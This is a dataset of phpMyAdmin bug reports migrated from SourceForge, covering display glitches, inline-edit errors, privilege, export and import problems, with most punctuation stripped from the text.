When browsing some database table if you click on the options toggle link the div that displays is cut from below, it is overlapped by the table see the screenshot 1).
This happens in Chrome and Firefox.
In IE 9 the options link doesn t display altogether see screen shot 2).
Original URL https sourceforge.net p phpmyadmin bugs 3269 Original author ehteshamkafeel Found in version 3.3.10","bug"
"24444","9673","Revoking privileges when you lack ALL PRIVILEGES youself.
Case My dev super super had all global privilege boxes checked except for File , using mysql 5.0 and 5.1) When I tried to remove a database specific privilege for some user this silently failed.
The reason for this is that we try REVOKE ALL PRIVILEGES ON `test` .
FROM piet ; first and then GRANT all the boxes the were checked.
Since my user did not have the File privilege this was not allowed by mysql.
In a comment it states this query may fail, but this does not matter o) but I tend to disagree.
I m afraid there has to be some code to revoke all privileges that were not selected in the form.
Original URL https sourceforge.net p phpmyadmin bugs 3270 Original author helmo","bug"
"24444","9674","bug in new display.
Rien xc3xa0 dire, tout est sur la photo ...
Original URL https sourceforge.net p phpmyadmin bugs 3451 Original author ottaviano Found in version 3.4.5","bug"
"24444","9675","Cannot print data dictionary beyond page 1.
I have phpmyadmin 3.3.8.1 on my Gentoo Linux LAN server, together with php 5.3.6, mysql 5.1.51 and apache 2.2.17.
The MySQL database contains 14 tables, most of which contain only a few records.
PhpMyAdmin lives in var www localhost htdocs phpmyadmin; it displays correctly, including the data dictionary, and it inserts, modifies and deletes fields correctly, but when I attempt to print the data dictionary the print preview page in Firefox 3.6.16 shows only the first page it cannot be persuaded that several more pages exist.
Only one page is printed, too.
I m running the browser on my workstation Gentoo Linux) on the same network; I ve tried two other browsers on the same workstation, and the same three browsers running natively on the LAN server.
Same results.
I ve tried Firefox same version) against phpMyAdmin 3.3.9 on the same database MySQL 5.0.91 community and Web server cpsrvd 11.28.83) at my Web host, Zen Internet, with the same results.
Original URL https sourceforge.net p phpmyadmin bugs 3271 Original author essence4 Found in version 3.3.8","bug"
"24444","9676","inline edit save hides mysql message.
after a successful inline edit save, it does not show the sql message and the query .
Seems quite odd, as the display before and after the query is quite different.
Can also be seen on the demo server.
Original URL https sourceforge.net p phpmyadmin bugs 3272 Original author onebighack Found in version Latest Git","bug"
"24444","9677","Create table and information schema.
Do not offer the Create table link in navigation panel for information schema.
Original URL https sourceforge.net p phpmyadmin bugs 3275 Original author lem9 Found in version Latest Git","bug"
"24444","9678","Inline edit does not honor bit fields.
Inline editing a bit field generates an SQL that considers the value for the bit field just as a normal string.
Instead it should follow either of b value or 0bvalue formats.
Original URL https sourceforge.net p phpmyadmin bugs 3278 Original author madhuracj Found in version Latest Git","bug"
"24444","9679","Empty field does not honor field type.
Steps to reproduce 1\.
Go to table film of sakila database on the demo server.
2\.
Put the first row into the inline edit mode.
3\.
Remove selection for all the options from the multiselect for the field, special feature .
4\.
Save and refresh.
5\.
Now put the same row into the inline mode and multiselect does not appear this time for special feature column.
Original URL https sourceforge.net p phpmyadmin bugs 3279 Original author madhuracj Found in version Latest Git","bug"
"24444","9680","DES DECRYPT fails on special characters.
If you try to encrypt and decrypt a string with special characters phpmyadmin fails to display the result This sql statment works in CLI but not in phpmyadmin select DES DECRYPT DES ENCRYPT testxc2xa7test )); Original URL https sourceforge.net p phpmyadmin bugs 3456 Original author lord rod Found in version 3.4.6","bug"
"24444","9681","Inline edit introduces spaces to empty fields.
If you put a row which has a field with an empty string to the inline edit mode and save without doing any changes, generated SQL converts the empty string to a space character.
Original URL https sourceforge.net p phpmyadmin bugs 3280 Original author madhuracj Found in version Latest Git","bug"
"24444","9682","Insert ajax form generate wrong query..
I tried to select insert with 5 rows or 10 rows is the same, just do not choose default 2 rows) and make an insert into following table phpMyAdmin SQL Dump version 3.4.0 rc1 http www.phpmyadmin.net Host localhost Generation Time Apr 23, 2011 at 05 46 PM Server version 5.1.33 PHP Version 5.2.9 SET SQL MODE= NO AUTO VALUE ON ZERO ; SET time zone = 00 00 ; Database `game tat` Table structure for table `tat data item collection` CREATE TABLE IF NOT EXISTS `tat data item collection` `id` int 11) NOT NULL AUTO INCREMENT, `name` varchar 100) DEFAULT NULL, `codename` varchar 50) DEFAULT NULL, `image name` varchar 50) NOT NULL, `description` text NOT NULL, `dropable` tinyint 1) NOT NULL DEFAULT 1 , `collection id` int 11) DEFAULT NULL, `is showcase` tinyint 4) NOT NULL DEFAULT 0 , `data serialized` text NOT NULL, `enable` tinyint 4) NOT NULL DEFAULT 1 , PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO INCREMENT=7 ; Dumping data for table `tat data item collection` INSERT INTO `tat data item collection` `id`, `name`, `codename`, `image name`, `description`, `dropable`, `collection id`, `is showcase`, `data serialized`, `enable`) VALUES 1, collection 1 1 , collection 1 1 , collections collection 1 1.png , 1 , 1, 0, 1, , 1), 2, collection 1 2 , collection 1 2 , collections collection 1 2.png , 1 , 1, 0, 1, , 1), 3, collection 1 3 , collection 1 3 , collections collection 1 3.png , 1 , 1, 0, 1, , 1), 4, collection 1 4 , collection 1 4 , collections collection 1 4.png , 1 , 1, 0, 1, , 1), 5, collection 1 5 , collection 1 5 , collections collection 1 5.png , 1 , 1, 0, 1, , 1), 6, collection 1 6 , collection 1 6 , collections collection 1 6.png , 0 , 1, 1, 1, , 1); It generate below query when I input 3 row data INSERT INTO `game tat`.`tat data item collection` `id`, `name`, `codename`, `image name`, `description`, `dropable`, `collection id`, `is showcase`, `data serialized`, `enable`) VALUES NULL , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ), NULL , 1 , 2 , 3 , , 5 , 6 , 7 , , 9 ), NULL , 1 , 2 , 3 , 5 , 6 , 7 , 9 ); Expected result should be INSERT INTO `game tat`.`tat data item collection` `id`, `name`, `codename`, `image name`, `description`, `dropable`, `collection id`, `is showcase`, `data serialized`, `enable`) VALUES NULL, 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ), NULL, 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ), NULL, 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ); You can see that there s some value missing like 4 and 8 in row 2 and missing value in row 3 Original URL https sourceforge.net p phpmyadmin bugs 3282 Original author paiboonpa Found in version 3.4.0","bug"
"24444","9683","Insert ajax form do not generate default value..
When you choose to insert like 5 or 10 rows, at the third row to last row, no default value auto fill at all.
It s just generate a blank input box.
Original URL https sourceforge.net p phpmyadmin bugs 3283 Original author paiboonpa Found in version 2.11.9","bug"
"24444","9684","Error message at first use.
When I use phpMyAdmin 3.4.0 rc1 the first time, I obtain an error, but I can use the software Parse error syntax error, unexpected , in C \Program Files\PHPServer 5.3.5 M5.5\phpmyadmin\libraries\language stats.inc.php on line 6 Maybe an idea ?
Original URL https sourceforge.net p phpmyadmin bugs 3284 Original author free being Found in version 3.4.0","bug"
"24444","9685","Row export not working after inline edit.
Please refer to the database structure I attached.
If you inline edit the `name` field and change myname to e.g.
mynamex and then try to export that row, the query executed will still use the old value myname .
SELECT FROM `inline edit` WHERE `inline edit`.`name` = myname ) ) phpMyAdmin 3.4.0 rc1 PHP 5.3.5 MySQL 5.1.49 Browser Firefox 4.0 on Ubuntu Original URL https sourceforge.net p phpmyadmin bugs 3285 Original author smottt Found in version 3.4.0","bug"
"24444","9686","Fatal error in server privileges.php.
This happened on demo server when some bot posted on server privileges.php PHP Fatal error Call to a member function isSuccess ) on a non object in pma server privileges.php on line 1453 012 Original URL https sourceforge.net p phpmyadmin bugs 3286 Original author nijel Found in version Latest Git","bug"
"24444","9687","SQL tab multiple AJAX requests on one click.
Issue following SQL queries from database SQL tab with AJAX enabled one at a time) 1\.
CREATE TABLE t1 x int) 2\.
DROP TABLE t1 3\.
DROP TABLE t1 I see three errors saying 1051 Unknown table t1 instead of one 4.CREATE TABLE t1 x int) Table is created and I get an error saying 1050 Table t1 already exists Tested on Firefox 3 and 4.
In FireBug, after clicking on Go, I see multiple POSTs to import.php instead of just one.
Original URL https sourceforge.net p phpmyadmin bugs 3287 Original author crackpl Found in version Latest Git","bug"
"24444","9688","PHP error on invalid XLS file import.
PHP Fatal error Uncaught exception Exception with message The filename tmp phpQ2ymKo is not recognised as an OLE file in libraries PHPExcel PHPExcel Shared OLERead.php 87 Stack trace 0 libraries PHPExcel PHPExcel Reader Excel5.php 1069) PHPExcel Shared OLERead gt;read tmp phpQ2ymKo ) 1 libraries PHPExcel PHPExcel Reader Excel5.php 584) PHPExcel Reader Excel5 gt; loadOLE tmp phpQ2ymKo ) 2 libraries import xls.php 45) PHPExcel Reader Excel5 gt;load tmp phpQ2ymKo ) 3 import.php 375) require .
libraries import xls.php ) 4 \{main\} thrown in libraries PHPExcel PHPExcel Shared OLERead.php on line 87 Original URL https sourceforge.net p phpmyadmin bugs 3289 Original author nijel Found in version Latest Git","bug"
"24444","9689","Order By in a query containing comment character.
1 I execute a simple query Select from pma column info Where 1 2 I comment the Where 1 statment an re execute the query Select from pma column info Where 1 3 I change the order by click on the column name, and the query become like this Select from pma colum info Where 1 Order By db name 4 And again Select from pma colum info Where 1 Order By db name ASC Order by table name ASC ...
Original URL https sourceforge.net p phpmyadmin bugs 3291 Original author arescleb","bug"
"24444","9690","Incoherent backup generated.
In SQL Export mode, phpmyadmin generates incoherent backups.
Besides, it does not backup relations.
How to reproduce Run attached PHP script on a testdb database Original URL https sourceforge.net p phpmyadmin bugs 3292 Original author anonymous Found in version 3.5.5","bug"
"24444","9691","Table filter case sensitive.
Searching for a table in a database is case sensitive.
Please make it case insensitive.
If you have a mixture of tables where some contain Uppercase characters and you type in lowercase only, the uppercase tables are not found.
Original URL https sourceforge.net p phpmyadmin bugs 3294 Original author anonymous Found in version 3.4.0","bug"
"24444","9692","Synchronize and already configured host.
When synchronizing and choosing one of the hosts already configured, we should be able to specify the database name.
Original URL https sourceforge.net p phpmyadmin bugs 3295 Original author lem9 Found in version 3.4.0","bug"
"24444","9693","Iconic table ops does not remove Inline Edit .
When I set Iconic table operations Settings gt; Main Frame gt; Browse Mode) to yes , labels no longer displayed next to action icons which is correct) except for edit inline icon, where the label is still displayed.
Original URL https sourceforge.net p phpmyadmin bugs 3296 Original author wesha Found in version 3.4.0","bug"
"24444","9694","2014 Commands out of sync; you can t run this command now.
Happens on CALL of procedure doing an INSERT or UPDATE if dataset exists) into a table.
Should mean missing calls of PHP functions.
See for defails http dev.mysql.com doc refman 5.1 de commands out of sync.html Architecture phpMyAdmin 3.4.7.1 PHP 4.4.9 MySQL 5.1.58 Example statement CALL spFieldData 0999 , 62942, Testing field , Grade Name , 12.3, 2011 11 11 , 2011 11 13 , 12xc2xb034 56.78 N , 98xc2xb076 54.32 E ); For stored procedure details see attachment.
Original URL https sourceforge.net p phpmyadmin bugs 3475 Original author djjeff80 Found in version 3.4.7","bug"
"24444","9695","font size selectbox isn t working.
i m using latest stable phpmyadmin 3.4.0.
And the selectbox for font size in main page isn t wokig.
It is set to 82 and cannot be changed.
the changes are just ignored.
Original URL https sourceforge.net p phpmyadmin bugs 3297 Original author anonymous Found in version 3.4.0","bug"
"24444","9696","Inline edit does not change the hidden ID.
Example 1) Create a table with an ID column and a few data columns 2) Insert a couple rows into that table with ID s 1 and 2 values of other columns don t matter) 3) Browse that table.
4) Click inline edit on the row with ID = 1 5) Change ID to 3 and save 6) Click Edit NOT inline) on that row 7) You get MySQL returned an empty result set i.e.
zero rows).
SELECT FROM `some table` WHERE `some table`.`id` =1; Note that you have changed through inline edit) the ID of that row to 3, but phpmyadmin still thinks that row has id of 1.
Original URL https sourceforge.net p phpmyadmin bugs 3299 Original author wesha Found in version 3.4.0","bug"
"24444","9697","Error trying to set table privileges.
Used phpMyAdmin 3.4.0.
Create a user and try to set table privileges.
There is an error REVOKE ALL PRIVILEGES ON `Users` .
FROM test pass test localhost ; 1141 There is no such grant defined for user test pass test on host localhost The only way to make it working I found is to revert to the old fuction PMA DBI try query ).
File server privileges.php, line 1190 if !
PMA DBI query sql query0)) \{ Should be changed back to if !
PMA DBI try query sql query0)) \{ Original URL https sourceforge.net p phpmyadmin bugs 3300 Original author hanut Found in version 3.4.0","bug"
"24444","9698","Tabs break when squeezing page.
Steps to reproduce Make your browser window wide 1000px) Login to PMA Squeeze page down to a few hundred px Tabs display incorrectly Unsqueeze the page a bit Tabs display fine again Please view attached screenshot for illustration Original URL https sourceforge.net p phpmyadmin bugs 3301 Original author roccivic1 Found in version Latest Git","bug"
"24444","9699","Inline edit and cfg[ PropertiesIconic ].
Inline edit link is not displayed when cfg[ PropertiesIconic ] is set to false.
There are JavaScript errors reported by the browser.
Original URL https sourceforge.net p phpmyadmin bugs 3302 Original author madhuracj Found in version Latest Git","bug"
"24444","9700","Some browsers report an insecure https connection.
I am running phpMyAdmin on https with a SSL serctificate.
After upgrading to phpMyAdmin 3.4.0, the front page and most subpages gives Insecure connection in Opera Webbrowser.
However the connection is Secure when browsing the actuall databases pages, but on front page and main menu pages, it gives Insecure contection .
In other browsers this does not happen.
I do not have these problems with https and Opera in phpMyAdmin 3.3.10 or older, only the newest phpMyAdmin version 3.4.0 I am using the newest Opera webbrowser version 11.10 on Windows 7.
The problem happens on both the Original and the pmahomme theme.
I did test in Firefox, and did not have this problem in that browser.
Server information CentOS 5.6 64bit, Apache 2.2.18, MySQL 5.1.57, php 5.2.17 Please see attached screenshot from Opera webbrowser.
Original URL https sourceforge.net p phpmyadmin bugs 3303 Original author aommundsen Found in version 3.4.0","bug"
"24444","9701","Synchronize and user name.
phpMyAdmin 3.4.0, also tried latest 3.5 , in which it is partly fixed.
I tried a Win32 server, and then duplicated it on a CentOS5 server.
When I select any server except current connection then a number of input boxes appear for server, port, username, password etc.
The problem is I cannot enter any data into them.
I can click in them but no cursor appears, and no data can be typed in.
In the latest version of 3.5 master 20110516 022001, the password and db fields can be edited, but I cannot change the default user name.
In 3.4.0, the Linux server prefills the user name with root , but the Win32 one does not.
Win32 Versions XP SP3 fresh install), Apache 2.2.18, php 5.2.17 VC6 TS), Mysql 5.1.57.
CentOS 5.5 versions Apache 2.2.3 45 php 5.2.10 1 Mysql 5.0.77 4 PHP modules CentOS) bz2 calendar ctype curl date dbase exif filter ftp gd gettext gmp hash iconv json ldap libxml mbstring mcrypt mysql mysqli openssl pcntl pcre PDO pdo mysql pdo sqlite posix pspell readline Reflection session shmop SimpleXML snmp sockets SPL standard sysvmsg sysvsem sysvshm tokenizer wddx xml zip zlib Clients FF 4.0.1 and IE 8 under WinXP FF 3.6.17 under Win7 and under CentOS Original URL https sourceforge.net p phpmyadmin bugs 3304 Original author camerond Found in version 3.4.0","bug"
"24444","9702","Row check boxes missing when row links are disabled.
If you disable both Show table row links on left side and Show table row links on right side in your configuration see below for exact steps to reproduce), the row checkboxes are no longer visible.
Check all appears to have no effect as well.
Steps to reproduce 1\.
Settings gt; Main Frame gt; Browse mode 2\.
Uncheck both Show table row links on left side and Show table row links on right side 3\.
Save 4\.
Browse a table you ll notice the checkboxes next to each row are missing as well.
Affects phpMyAdmin 3.4.0 release) phpMyAdmin master 20110516 022001 snapshot) Tested with Chromium 11.0.696.65 84435) Ubuntu 11.04 Firefox 4.0.1 Original URL https sourceforge.net p phpmyadmin bugs 3305 Original author kianmohageri Found in version Latest Git snapshot","bug"
"24444","9703","Inline edit and cfg[ PropertiesIconic ].
Related to bug report ID 3302457 but not fixed in 3.4.1 rc1 Inline edit text link is still displayed when cfg[ PropertiesIconic ] is set to true.
Original URL https sourceforge.net p phpmyadmin bugs 3306 Original author drito Found in version 3.4.1","bug"
"24444","9704","BOOLEAN DEFAULTFALSE.
When I add a boolean field to a table and set the default to 0, the field gets added to the table properly, but the output of the SQL that was used outputs as ALTER TABLE `maps` ADD `updated` BOOLEAN NOT NULL DEFAULTFALSE AFTER `active` note the missing space between DEFAULT and FALSE, it should be ALTER TABLE `maps` ADD `updated` BOOLEAN NOT NULL DEFAULT FALSE AFTER `active` Original URL https sourceforge.net p phpmyadmin bugs 3491 Original author benjamwelker Found in version Latest Git","bug"
"24444","9705","Unnecessary scrolling on Databases page.
See https sourceforge.net projects phpmyadmin forums forum 72909 topic 4531938 index page 1 Original URL https sourceforge.net p phpmyadmin bugs 3307 Original author lem9 Found in version 3.4.1","bug"
"24444","9706","master is not a reserved word.
Running sql SELECT id, master FROM table example WHERE master = 2 prints SELECT id, MASTER FROM table example WHERE MASTER = 2 LIMIT 0 , 30 master as table column) should not be highlited and capitalized.
Tested on 3.4.0.0 and on 3.3.9.0, both with the same behaviour.
Original URL https sourceforge.net p phpmyadmin bugs 3308 Original author pevik Found in version 3.4.0","bug"
"24444","9707","Insert no longer works in 3.4.0.
Insert was working perfectly for me using 3.3.x, but now gives a missing parameter bug for table replace.php I have read the suggested fixes for this kind of issue, and none of them apply.
I only made minimal changes to my config.inc.php needed to bring it up to date with 3.4.
I attach here my php.ini file and config.inc.php in case these help.
Original URL https sourceforge.net p phpmyadmin bugs 3309 Original author anonymous Found in version 3.4.0","bug"
"24444","9708","Some tooltips don t disappear.
Some tooltips, like those of db structure page don t disappear until you hover over the element that triggered them in the first place or click somewhere else on the page.
This can be annoying as they may be covering up the tabs, like in the attached screenshot.
Tested on Firefox 4.0.1 and Chromium 11.0; Ubuntu Linux 11.04 64 bit; Original URL https sourceforge.net p phpmyadmin bugs 3312 Original author roccivic Found in version Latest Git","bug"
"24444","9709","SELECT DISTINCT displays wrong total.
I ve tested this on two versions of phpMyAdmin including 3.3.7 and 3.4.8 and using both MyISAM and INNODB engines.
SELECT DISTINCT column) FROM table; returns the wrong count.
If I add the LIMIT exactly like it shows in the result the correct count is returned.
SELECT DISTINCT column) FROM table LIMIT 0,30; Original URL https sourceforge.net p phpmyadmin bugs 3495 Original author aaronott Found in version 3.4.8","bug"
"24444","9710","Table is dropped regardless of confirmation.
When executing a DROP TABLE query from the SQL tab, the table is dropped regardless of whether the user clicks OK or CANCEL.
To reproduce 1) Go to demo server 2) From the SQL tab execute CREATE TABLE `test` `a` int 11) NOT NULL ); 3) Again, from the SQL tab, execute DROP TABLE `test`; 4) When asked for confirmation, click Cancel 5) The table is dropped anyway This is a serious issue.
Original URL https sourceforge.net p phpmyadmin bugs 3313 Original author roccivic Found in version Latest Git","bug"
"24444","9711","ODS import truncates field.
I m using my web host s install of phpMyAdmin 3.4.5 to import an ODS file as a new table.
The import is generally going fine, except that one field seems to be sporadically truncating values.
It doesn t appear it s related to the length of the entry and I can t detect any special characters that would be causing the problem.
Is this a known issue or is there anything else I should be looking for?
The field is pcontent .
I ve attached an import file with just a header row and an example data row that gets truncated.)
Original URL https sourceforge.net p phpmyadmin bugs 3497 Original author rmacmich Found in version 3.4.5","bug"
"24444","9712","Results from show create databases is truncated.
1) go to sql query screen 2) show create databases here a db name the result is displayed but truncated to the right; I need to know the charset and collation.
Original URL https sourceforge.net p phpmyadmin bugs 3316 Original author base6","bug"
"24444","9713","pmahomme and table statistics.
In table Structure, Space usage and Row statistics tables have a width of 99 , taking too much space.
Original URL https sourceforge.net p phpmyadmin bugs 3317 Original author lem9 Found in version 3.4.1","bug"
"24444","9714","goto parameter for sql.php is sometimes ignored.
goto parameter for sql.php is sometimes ignored, example 1\.
got to table preferences 2\.
follow link to truncate table eg.
open with middle button to avoid js confirmation) 3\.
confirm truncating table Now you end up on sql.php, but you should have been redirected to tbl structure.php.
Also table name seems to be forgotten on the way and we re back to parent database.
Original URL https sourceforge.net p phpmyadmin bugs 3318 Original author nijel Found in version 3.3.7","bug"
"24444","9715","Wrong confirmation for dropping truncating table.
undefined is shown there instead of table name You are about to DESTROY a complete table!
Do you really want to DROP TABLE undefined You are about to TRUNCATE a complete table!
Do you really want to TRUNCATE TABLE undefined Original URL https sourceforge.net p phpmyadmin bugs 3319 Original author nijel Found in version Latest Git","bug"
"24444","9716","Inline Edit updates multiple duplicate rows.
In tables without a PK, saving from an inline edit omits the LIMIT 1 clause of a normal edit save.
Thus, when saving one of many duplicate records, all the duplicates are updated.
Since only the edited record is updated on the page, any other duplicates displayed are now out of sync, and attempting to interact with them may lead to errors or other non obvious behavior.
Original URL https sourceforge.net p phpmyadmin bugs 3322 Original author cshanahan Found in version 3.4.1","bug"
"24444","9717","PMA show me double error.
some times PhpMyAdmin show me 2 error and not 1...take a look to the picture... sorry for bad english Original URL https sourceforge.net p phpmyadmin bugs 3323 Original author diopralinato","bug"
"24444","9718","Show all not persistent after a sort.
Maybe related to https sourceforge.net tracker ?func=detail aid=1851833 group id=23067 atid=377408, maybe not.
Original URL https sourceforge.net p phpmyadmin bugs 3325 Original author lem9 Found in version 3.4.1","bug"
"24444","9719","Changing indexes navigates away from previous table..
Dropping table indexes navigates away from the table that was being modified forcing the user to find and access the table again.
Original URL https sourceforge.net p phpmyadmin bugs 3326 Original author anonymous Found in version 3.4.1","bug"
"24444","9720","Delete edit export all buttons don t work..
When using the Delete edit export ass buttons at the bottom of a resultset) i get an insert page served.
Browser Mozilla Firefox 4.0.1 PHP 5.2.6 1 lenny9 with Suhosin Patch 0.9.6.2 MySQL client version 5.0.51a PHP extension mysqli Original URL https sourceforge.net p phpmyadmin bugs 3329 Original author anonymous Found in version 3.4.1","bug"
"24444","9721","Storing RSA Keys in a database issue.... Hello All I am one of the main developers to a browser based game and I am currently setting up an Auth server to store all the users account information, this uses OpenSSL with RSA key pairs to talk to and from our Auth Server to Game Servers so that we only pass hash to the game servers which is then used to requiest the required user infomation, so we have secure communication between the two servers.
The issue that I am having is I am trying to store the RSA Key Certifcates into the database but when I insert all the information via the insert GUI its displays the following You don t have permission to access URLPATH tbl replace.php on this server.
This also happens if I try it with the root login which has full access MySQL and Appache) so its not an access issue.
However it works fine if I add the following into the SQL GUI INSERT INTO `servers2` `id`, `game`, `url`, `hash id`, `caption`, `description`, `status`, `type`, `last reset`, `next reset`, `duration`, `iduration`, `cert`, `cert pw`) VALUES NULL, gamename , gameurl , gamehash , gametitle , gamedesc , disabled , invite , 0000 00 00 00 00 00 , 0000 00 00 00 00 00 , gameduration , 0, BEGIN CERTIFICATE \nKEYINFO REMOVED\n END CERTIFICATE \n , ); Also once its all inserted fine I can no longer edit that row via the GUI, however I can edit it if I use the SQL GUI and enter SQL to change the required data.
Not too sure, but I think it may be down to the BEGIN CERTIFICATE and the END CERTIFICATE that is wrapped around the Certificate data.
I can strip those lines and base64 decode the data and then store that as binary data thats works fine, but I shouldn t need to do all that, I should be able to strore it as text with the wrappers.
So is there any chance in this being fixed because I am ATM entering them in by hand while I am working on my Admin page.
Let me know if you require any more information.
Thanks in advance Paul Original URL https sourceforge.net p phpmyadmin bugs 3504 Original author themightydude Found in version 3.4.9","bug"
"24444","9722","SQL editor and back navigation problem.
With CodeMirror Back navigation do not restore modified query in textarea... steps 1\.
open SQL tab forany table 2\.
modify query from SELECT FROM `your table` WHERE 1 to SELECT FROM `your table` WHERE 2 and execute it 3\.
press Back button result in textarea SELECT FROM `your table` WHERE 1 expected result in textarea SELECT FROM `your table` WHERE 2 tested on Opera, Firefox and IE9 As quick fix you can just add setting turn off CodeMirror ...
Original URL https sourceforge.net p phpmyadmin bugs 3508 Original author sailormax Found in version 3.5.0","bug"
"24444","9723","Some links are trasformed in buttons.
I dunno what are happens here i have only opened this in new window... see the picture...i think that is a css problem.
Original URL https sourceforge.net p phpmyadmin bugs 3509 Original author diopralinato","bug"
"24444","9724","Complex query export fails.
When running a complex query see attached) and then attempt to export the result, the exported file contains a MySQL syntax error message.
It seem that phpmyadmin is removing the signs where I m adding values together in the statement.
Thanks, Wade Original URL https sourceforge.net p phpmyadmin bugs 3331 Original author hedgreww Found in version 3.4.1","bug"
"24444","9725","No warning on syntax error in search form.
when there is a syntax error in the search form, there is no warning to reproduce, type 1, 2, 5 without the quote in an integer field and forgot to select IN ) , clic on search = gt; searching... = gt; and then nothing Original URL https sourceforge.net p phpmyadmin bugs 3512 Original author anonymous Found in version 3.4.9","bug"
"24444","9726","Missing helper icons in Synchronize.
With pmahomme theme, the icons that should be explaining the goal of the red S and the green D are not visible next to their explanation.
Original URL https sourceforge.net p phpmyadmin bugs 3333 Original author lem9 Found in version 3.4.2","bug"
"24444","9727","Columns class sometimes changed for nothing.
With BrowsePointerEnable set to false, hovering over a column header should not change the class of all rows for this column.
Original URL https sourceforge.net p phpmyadmin bugs 3334 Original author lem9 Found in version 3.4.2","bug"
"24444","9728","Export SQL Query.
Hi, I m using phpmyadmin at work and I changed my version of phpmyadmin to a newest 3.4.3.1).
When i want to export this query SELECT facture.date emission as date facture, CONCAT WS , facture.num fact , facture.facture valide id) as Numero Facture, pdl.numero pdl as PDL, facture poste.periode FROM facture poste JOIN pdl ON pdl.id=facture poste.pdl JOIN facture ON facture.id=facture poste.external facture id JOIN tauxtva ON facture poste.tauxtva=tauxtva.id JOIN cp communes ON cp communes.commune=pdl.ville AND cp communes.code postal=pdl.code postal WHERE facture.date emission= 2012 02 01 ORDER BY facture.facture valide id using export in the end of the page) And if I want to export the next one it s not working SELECT facture.date emission as date facture, CONCAT WS , facture.num fact , facture.facture valide id) as Numero Facture, pdl.numero pdl as PDL, facture poste.periode as mois conso FROM facture poste JOIN pdl ON pdl.id=facture poste.pdl JOIN facture ON facture.id=facture poste.external facture id JOIN tauxtva ON facture poste.tauxtva=tauxtva.id JOIN cp communes ON cp communes.commune=pdl.ville AND cp communes.code postal=pdl.code postal WHERE facture.date emission= 2012 02 01 ORDER BY facture.facture valide id It s not because of the aliases, I checked by exporting more fields without using aliases and the problem was there.
If you need more informations, I ll be glad to give you more details.
Thanks !
Original URL https sourceforge.net p phpmyadmin bugs 3514 Original author tsubasa62 Found in version 3.4.3","bug"
"24444","9729","Export with like and syntax return empty file.
If you do a query with like something that returns rows and then click export the xported file is empty Original URL https sourceforge.net p phpmyadmin bugs 3336 Original author andretna Found in version 3.4.2","bug"
"24444","9730","Generate Password option missing on new accounts.
Since 3.4.1 I didn t try 3.4.0 and likely exists there as well), I m no longer getting the Generate Password box when creating new accounts.
I saw something in the 3.4.0 release notes about a bug Generate password only available if JS is enabled fixed for Privileges and Change password) .
But I m not sure what that means.
I assume JS means javascript.
That is enabled in my browser.
And all other javascript features appear to be working.
Is there a new config option to enable the Generate Password feature?
Original URL https sourceforge.net p phpmyadmin bugs 3337 Original author anonymous Found in version 3.4.2","bug"
"24444","9731","Multiple Left Columns on Re Login.
I searched but didnt find this bug, sorry if it\ s a repeat.
After time out, PHPMyAdmin kicks to the login screen.
When logging back in, there\ s a 80 chance this bug will happen... Basically, the left column triplicates.
It happens 3 times, so you have 1 2 3 left columns where tables are listed.
I upgraded from alpha 1 to beta 1, bug still exists.
PS Attached screenshot!
Thank you!!!
Love PHPMyAdmin ) Original URL https sourceforge.net p phpmyadmin bugs 3517 Original author nathanh0 Found in version 3.5.0","bug"
"24444","9732","Parse error syntax error, unexpected .
Version 3.5.0 dev and 3.4.2 When I choose a Russian localization interface and when I trying to search for cyrillic strings in a database error is displayed Parse error syntax error, unexpected in srv http pma.cihar.com master config libraries php gettext gettext.php 361) eval ) d code on line 1 When I choose the English interface localization, the error is not.
Steps 1\.
Go to http demo.phpmyadmin.net , set language xd0xa0xd1x83xd1x81xd1x81xd0xbaxd0xb8xd0xb9 Russian , select server MySQL, database Fellowship CREATE TABLE IF NOT EXISTS `people` `id` int 11) NOT NULL AUTO INCREMENT, `name` varchar 255) NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=3 ; INSERT INTO `people` `id`, `name`) VALUES 1, bla bla ), 2, ho ho ho ); 2\.
Click xd0x9fxd0xbexd0xb8xd1x81xd0xba Search), 3\.
Type cirilic string for search xd0xb0xd0xb1xd0xb2xd0xb3 4\.
Select table people 5\.
Click OK button.
Original URL https sourceforge.net p phpmyadmin bugs 3338 Original author lblss Found in version 3.4.2","bug"
"24444","9733","Slight Visual bug with help boxes.
When hovering over the help images ?)
the box displays correctly and if you mouse over the open box this works, The problem is if you mouse over the open box then mouse to the page not the ?)
again it stays open, where if you mouse over the ?)
then off to not onto the support box the box will close again, Please find Image attached that is after 2 mins of inactivity and the boxes are still visible This maybe page specific Synchronize is the page this was occuring for me Original URL https sourceforge.net p phpmyadmin bugs 3340 Original author anonymous Found in version 3.4.2","bug"
"24444","9734","PMA ajaxShowMessage ) does not respect timeout.
AJAX messages shown with PMA ajaxShowMessage ) sometimes disappear much faster than they are supposed to.
go to demo server select sakila db go to browse actor table select inline edit on some row click save click inline edit again wait 3 seconds click save actual result the second AJAX message was only shown for a fraction of a second expected result the second AJAX message shown for the default duration of 5 seconds Original URL https sourceforge.net p phpmyadmin bugs 3341 Original author roccivic Found in version 3.4.2","bug"
"24444","9735","inline edit places <br >.
i have a field varchar 9) with 0,0 in it when i edit it is becomes 0,2 or wat ever i wanted.
do i use inline edit en i put alkso 0,2 is chenges it to 0,2 lt;br gt;.
Thios is realy annaoying becouse with the lt;br gt; my ste doesn t work.
Stijnhau Original URL https sourceforge.net p phpmyadmin bugs 3342 Original author stijnhau Found in version 3.4.2","bug"
"24444","9736","Incorrect redirect after insert into table.
To reproduce go to demo server go to sakila db go to actor table go to insert tab fill out the form with some random values ensure that go back to previous page is selected in the fieldset at the bottom of the page submit form Actual result the row is inserted and the user is redirected to tbl replace.php Expected result the row is inserted and the user is redirected to where s)he came from Original URL https sourceforge.net p phpmyadmin bugs 3343 Original author roccivic Found in version 3.4.2","bug"
"24444","9737","Can t edit delete records in tables without primary index.
Can you fix work with tables without primary index?
Now Edit Delete record buttons work as page reloader ) My solution select records by all fields and output error warning if we have more then one record with possible to continue operation delete) thank you.
Original URL https sourceforge.net p phpmyadmin bugs 3345 Original author sailormax Found in version 3.4.0","bug"
"24444","9738","Login page after timeout and password managers.
